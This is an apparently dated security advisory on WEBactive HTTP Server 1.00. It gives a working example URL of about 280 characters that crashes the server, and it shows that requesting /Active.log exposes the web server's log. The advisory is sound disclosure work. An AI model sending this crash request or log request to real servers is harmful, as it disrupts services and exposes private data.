Application: ITAfrica's WEBactive version 1.00
Problem Type: Denial of Service
Author: Prizm(Prizm@RESENTMENT.org)
Platform(s): Windows 95/NT
Vendor Status: Not Informed, Project discontinued(I think)
Download URL: ftp://ftp.mira.net/mirrors/winsock-l/Windows95/Daemons/HTTPD/activ100.zip

Product Description
-------------------
WEBactive HTTP Server 1.00 is an HTTP/1.00-compliant World Wide Web server daemon for
Windows 95 or Windows NT, specifically designed for the SOHO (Small Office/Home)
environment. It will operate on any TCP/IP connection to the Internet, whether via temporary
dial-up or permanent leased-line connectivity. 

Problem
-------

The problem is with bounds checking, when you request 280 characters Webactiv.exe just shuts down.

Quick Example:

http://somedomain/0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000

*Also* by simply requesting /Active.log, you can view the webserver log, because Active.log is 
       the default logfile name and the default directory is where that file is stored.

Vendor Status
-------------

Heh, this server was discontinued as far as I see... it is rather dated and doesn't support much.
Seeing as it was last revised in 1996, i think contacting the vendor would be rather meaningless... Also the fact that it is HTTP/1.00-compliant kind of hints it is no longer being updated.

Greetings
---------

Lamagra, Scrippie, eth0, Cruciphux/HWA and many others...